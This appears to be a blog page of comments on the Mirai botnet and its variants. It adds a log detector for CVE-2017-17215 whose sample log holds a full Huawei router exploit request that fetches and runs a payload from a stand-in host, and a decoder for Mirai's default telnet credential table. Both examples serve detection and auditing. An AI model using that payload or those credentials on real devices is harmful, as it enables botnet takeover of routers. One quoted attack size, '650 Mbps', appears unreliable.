Meet Linux.Mirai Trojan, a DDoS nightmare


  1. Tomi Engdahl says:

    Three Plead Guilty in Mirai Botnet Attacks

    US officials unveiled criminal charges Wednesday against a former university student and two others in the Mirai botnet attacks which shut down parts of the internet in several countries starting in mid-2016.

    The Justice Department announced plea agreements for Paras Jha, 21 — a former Rutgers University computer science student who acknowledged writing the malware code — and Josiah White, 20, and Dalton Norman, 21, who helped profit from the attacks.

    In documents unsealed Wednesday, Jha admitted writing the code for the botnet which harnessed more than 100,000 “internet of things” (IoT) devices such as cameras, light bulbs and appliances to launch the attacks.

    By commanding an army of bots — or computers under control of the attackers — the malware shut down networks and websites in the United States, Germany, Liberia and elsewhere.

    The malware was used to make money through “click fraud,” a scheme that makes it appear that a real user has clicked on an advertisement for the purpose of artificially generating revenue, according to officials.

    The three generated some $180,000 from the scheme in bitcoin, Justice officials added.

  2. Tomi Engdahl says:

    Mirai-makers plead guilty, Hajime still lurks in shadows

    Riot doesn’t go in for New Year predictions much, but we think Hajime will be a name on most security reporters’ lips at some point in 2018 – a more potent version of the Mirai malware that threatens to run rampant across the Internet of Many Unsecured Things. Mirai itself has made the news this week, because its apparent author has now pleaded guilty to such accusations, leveled against him by the FBI. However, this isn’t the end for the now open-sourced Mirai.

  3. Tomi Engdahl says:

    Mirai Variant “Satori” Targets Huawei Routers

    Hundreds of thousands of attempts to exploit a recently discovered vulnerability in Huawei HG532 home routers have been observed over the past month, Check Point security researchers warn.

    The attacks were trying to drop Satori, an updated variant of the notorious Mirai botnet that managed to wreak havoc in late 2016. Targeting port 37215 on Huawei HG532 devices, the assaults were observed all around the world, including the USA, Italy, Germany and Egypt, the researchers say.

    Common to these incidents was the attempt to exploit CVE-2017-17215, a zero-day vulnerability in the Huawei home router residing in the fact that the TR-064 technical report standard, which was designed and intended for local network configuration, was exposed to WAN through port 37215 (UPnP – Universal Plug and Play).
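
The comment above describes the Satori campaign against TR-064 on TCP/37215. The following is an added example for this page, not code from Check Point or from the Satori authors: a small detector that runs over HTTP request logs, flags CVE-2017-17215 attempts and extracts the injected shell command and the host the dropper fetches from. The request shape it matches (a POST to /ctrlt/DeviceUpgrade_1 whose SOAP Upgrade call carries a $(...) command substitution in NewStatusURL or NewDownloadURL) follows the public write-ups of the campaign and is not stated on this page; the JSON-lines log format, the timestamps and every IP address in the sample are constructed for the example.

```python
"""
Flag CVE-2017-17215 exploitation attempts (Huawei HG532, TR-064 reachable
on TCP/37215 from the WAN) in HTTP request logs and pull out the injected
command for follow-up. Added example for this page, not code from Check
Point or from the Satori authors. The request shape it looks for, a POST to
/ctrlt/DeviceUpgrade_1 whose SOAP Upgrade call carries a $(...) command
substitution in NewStatusURL or NewDownloadURL, follows the public reports
on the Satori campaign; the JSON-lines log format and every address below
are constructed for this example.
"""
import json
import re

TR064_PORT = 37215
UPGRADE_PATH = "/ctrlt/DeviceUpgrade_1"

# The command substitution inside either injectable element. The lazy match
# must still be followed by the closing tag, so inner parentheses in the
# payload do not cut the capture short.
INJECT_RE = re.compile(
    r"<(NewStatusURL|NewDownloadURL)>\s*\$\((.*?)\)\s*</\1>", re.DOTALL
)
# "busybox wget -g <host> ..." is how Mirai-family droppers fetch the binary.
DROPPER_RE = re.compile(r"wget\s+-g\s+(\S+)")

# Constructed sample log (JSON lines): one exploit attempt, one unrelated
# request, one Upgrade call on 37215 without an injected command.
SAMPLE_LOG = r'''
{"ts":"2017-12-05T10:14:02Z","src":"203.0.113.45","dst_port":37215,"method":"POST","path":"/ctrlt/DeviceUpgrade_1","body":"<?xml version=\"1.0\" ?><s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><s:Body><u:Upgrade xmlns:u=\"urn:schemas-upnp-org:service:WANPPPConnection:1\"><NewStatusURL>$(/bin/busybox wget -g 198.51.100.7 -l /tmp/.x -r /bins/mips; chmod +x /tmp/.x; /tmp/.x)</NewStatusURL><NewDownloadURL>HUAWEIUPNP</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>"}
{"ts":"2017-12-05T10:14:09Z","src":"192.0.2.8","dst_port":80,"method":"GET","path":"/","body":""}
{"ts":"2017-12-05T10:15:41Z","src":"203.0.113.77","dst_port":37215,"method":"POST","path":"/ctrlt/DeviceUpgrade_1","body":"<s:Envelope><s:Body><u:Upgrade><NewStatusURL>http://192.0.2.1/status</NewStatusURL><NewDownloadURL>http://192.0.2.1/fw.bin</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>"}
'''


def classify(entry):
    """Return ("exploit", cmd), ("probe", None), or None for one log entry."""
    if entry.get("dst_port") != TR064_PORT or entry.get("path") != UPGRADE_PATH:
        return None
    if entry.get("method") != "POST":
        return ("probe", None)
    m = INJECT_RE.search(entry.get("body", ""))
    if m:
        return ("exploit", m.group(2).strip())
    # An Upgrade call on 37215 from outside is still worth a look: TR-064 is
    # a LAN-side interface and should never be reachable from the WAN.
    return ("probe", None)


def scan_log(text):
    """Parse JSON-lines log text; return one dict per matching request."""
    hits = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        entry = json.loads(line)
        verdict = classify(entry)
        if verdict is None:
            continue
        kind, cmd = verdict
        hits.append({"ts": entry["ts"], "src": entry["src"], "kind": kind, "cmd": cmd})
    return hits


def dropper_hosts(hits):
    """Hosts the injected commands fetch their payload from (IOCs to block or hunt)."""
    hosts = set()
    for h in hits:
        if h["cmd"]:
            m = DROPPER_RE.search(h["cmd"])
            if m:
                hosts.add(m.group(1))
    return sorted(hosts)


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for h in found:
        print(h["ts"], h["src"], h["kind"], h["cmd"] or "")
    print("dropper hosts:", dropper_hosts(found))
```

Run it against your own honeypot or reverse-proxy logs by replacing SAMPLE_LOG with the file contents; any hit from a non-RFC1918 source means the router's TR-064 port is reachable from the internet and should be firewalled regardless of whether the exploit succeeded.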

  4. Tomi Engdahl says:

    From Mirai To Persirai — The Metamorphosis Of An Open Source Botnet

    The Mirai malware has become particularly notorious for recruiting IoT devices to form botnets that have launched some of the largest DDoS attacks ever recorded. Mirai came onto the scene in late 2016 as the malware supporting very large DDoS attacks, including a 650 Mbps attack on the Krebs on Security site. It’s also purported to have been the basis of the attack in October 2016 that brought down sites including Twitter, Netflix, Airbnb and many others. Since then, Mirai has morphed into the most aggressive and effective botnet tool we’ve seen to date.

    The Rise of Persirai

    This brings us to Persirai, the newest version of Mirai that was also discovered last month by researchers at Trend Micro and comes equipped with even more advanced “features.” Previous versions of Mirai used to rely on guessing default passwords, so any IoT devices that had default passwords changed were considered protected. Researchers discovered that Persirai became even more aggressive by exploiting a zero-day vulnerability to steal the password file from an IP camera regardless of password strength. Persirai’s ability to leverage the previous features, plus its password stealing capability has led to a massive increase in the number of infected devices. By tracking thousands of infected IoT devices, Trend Micro discovered over half of those in the U.S. are infected, with almost two-thirds of the cameras in Japan infected.

    Persirai is on an aggressive recruitment push.

    How to Avoid Being part of a Botnet

    Additional measures to ensure IoT devices do not become unwitting members of a Persirai botnet include blocking internet access to admin ports and disabling universal plug and play (UPnP) on the router or firewall. Also consider isolating IoT devices on your network using segmentation or firewall policies and only let IoT devices communicate with IP addresses that are approved. Finally, scan your network with our Mirai vulnerability scanner to see if it hosts a device vulnerable to Mirai injection attacks.

    Mirai Vulnerability Scanner

  5. Tomi Engdahl says:

    Mirai Variant Targets ARC CPU-Based Devices

    A newly discovered variant of the Mirai Internet of Things (IoT) botnet is targeting devices with ARC (Argonaut RISC Core) embedded processors, researchers warn.

    Dubbed Okiru, the new malware variant appears to be different from the Satori botnet, although the latter was also called Okiru by its author. Security researchers analyzing the new threat have discovered multiple differences between the two Mirai versions, aside from the targeting of the ARC architecture.

    Originally designed by ARC International, the ARC processors are 32-bit CPUs widely used in system on chip (SOC) devices for storage, home, mobile, automotive, and IoT applications. Each year, over 1.5 billion devices are shipped with ARC processors inside.

    Mirai Okiru represents the very first known malware targeting ARC processors, independent security researcher Odisseus, who analyzed the threat, notes.

    One of the characteristics that sets them apart is the configuration, which in Okiru is encrypted in two parts, with the telnet bombardment passwords encrypted. Satori doesn’t split it in two and doesn’t encrypt brute default passwords either. Moreover, the new malware variant can use up to 114 credentials for telnet attack, while Satori uses a different and shorter database.

    The researcher also explains that Okiru seems to lack the “TSource Engine Query” common Distributed “Reflective” (DRDoS) attack function via random UDP that Satori has.
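
The comment above contrasts how Okiru and Satori store their telnet credential tables. The following is an added example for this page, not code from Mirai, Okiru or Satori: it recovers a credential table stored the way the leaked original Mirai source stores it, and reproduces the weighted pick the scanner makes from that table. In the leaked scanner.c every byte of each username and password is XORed in turn with the four bytes of 0xDEADBEEF, which collapses to a single XOR with 0x22. The add_auth_entry() lines in the sample are constructed in that format for the example, not dumped from a real binary, and the key is the original Mirai one; treat it as an assumption for any variant, since the comment says Okiru encrypts its table differently and splits it in two.

```python
"""
Recover the telnet credential table from the obfuscated form used by the
leaked Mirai source, and reproduce the scanner's weighted choice from it.
Added example for this page, not code from Mirai, Okiru or Satori; the
add_auth_entry() lines below are constructed in the leaked source's format,
not dumped from a real sample.

Original Mirai (scanner.c) XORs every byte of each username and password
with the four bytes of 0xDEADBEEF in turn. Four XORs collapse to one:
0xDE ^ 0xAD ^ 0xBE ^ 0xEF = 0x22, so a single-byte XOR with 0x22 recovers
the table. Each entry carries a weight, and the scanner draws an entry with
probability proportional to that weight. The key here is the original Mirai
key and is an assumption for any variant.
"""
import re

TABLE_KEY = 0xDEADBEEF

# Constructed sample in the format of the leaked scanner.c (bytes already
# obfuscated; the trailing comments mirror how the source annotates them).
SAMPLE_SRC = r'''
add_auth_entry("\x50\x4D\x4D\x56", "\x5A\x41\x11\x17\x13\x13", 10);   // root  xc3511
add_auth_entry("\x50\x4D\x4D\x56", "\x54\x4B\x58\x5A\x54", 9);        // root  vizxv
add_auth_entry("\x50\x4D\x4D\x56", "\x43\x46\x4F\x4B\x4C", 8);        // root  admin
add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x43\x46\x4F\x4B\x4C", 7);    // admin admin
add_auth_entry("\x50\x4D\x4D\x56", "\x1A\x1A\x1A\x1A\x1A\x1A", 6);    // root  888888
add_auth_entry("\x50\x4D\x4D\x56", "", 4);                            // root  (none)
'''

ENTRY_RE = re.compile(
    r'add_auth_entry\("((?:\\x[0-9A-Fa-f]{2})*)",\s*"((?:\\x[0-9A-Fa-f]{2})*)",\s*(\d+)\)'
)


def effective_key(table_key=TABLE_KEY):
    """XOR of the four key bytes: what the four successive XORs amount to."""
    k = 0
    for shift in (0, 8, 16, 24):
        k ^= (table_key >> shift) & 0xFF
    return k


def deobf(blob, table_key=TABLE_KEY):
    """Undo the obfuscation on one byte string."""
    k = effective_key(table_key)
    return bytes(b ^ k for b in blob).decode("ascii", errors="replace")


def c_escapes_to_bytes(s):
    """Turn a C literal body made only of \\xNN escapes into raw bytes."""
    return bytes.fromhex(s.replace("\\x", ""))


def decode_table(src, table_key=TABLE_KEY):
    """Parse add_auth_entry() lines; return [(user, password, weight), ...]."""
    entries = []
    for user_esc, pw_esc, weight in ENTRY_RE.findall(src):
        user = deobf(c_escapes_to_bytes(user_esc), table_key)
        pw = deobf(c_escapes_to_bytes(pw_esc), table_key)
        entries.append((user, pw, int(weight)))
    return entries


def total_weight(entries):
    return sum(w for _, _, w in entries)


def random_auth_entry(entries, r):
    """Weighted pick as the Mirai scanner does it: r is a random integer in
    [0, total_weight); walk the table subtracting weights until it fits."""
    for user, pw, w in entries:
        if r < w:
            return (user, pw)
        r -= w
    raise ValueError("r out of range for this table")


if __name__ == "__main__":
    table = decode_table(SAMPLE_SRC)
    for user, pw, w in table:
        print(f"{w:3d}  {user!r:10} {pw!r}")
    print("effective XOR key:", hex(effective_key()))
```

The same decode_table() works on the leaked scanner.c itself, and the recovered username/password pairs are the list to check your own devices against: any of them accepted on telnet is a device this family will take.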

  6. Tomi Engdahl says:

    Researchers Connect Lizard Squad to Mirai Botnet

    Lizard Squad and Mirai, which are responsible for a series of notorious distributed denial of service (DDoS) attacks, are connected to one another, a recent ZingBox report reveals.

    Lizard Squad is a hacking group known for some of the most highly publicized DDoS attacks in history, including the disruption of Sony PlayStation and Xbox Live networks. Over the past several years, multiple individuals suspected to have used Lizard Squad’s LizardStresser DDoS service have been arrested.

    While the hacking group has been operating for several years, Mirai has been around for only one year and a half, making headlines in late 2016 following massive DDoS attacks against Brian Krebs’ blog and Dyn’s DNS infrastructure. The malware’s source code was made public within weeks of these attacks and numerous variants have emerged since.

    Now, ZingBox researchers claim to have discovered evidence that links the Lizard Squad hackers and Mirai, including the common use of the same Ukrainian hosting provider Blazingfast.

    The Mirai source code, the researchers point out, was released nine days after Lizard Squad founder Zachary Buchta was arrested. According to them, the DDoS attack on Brian Krebs’ blog in late 2016 appears to be the result of the journalist’s criticism of Lizard Squad, and there are also references to Mirai on a Lizard Squad website.

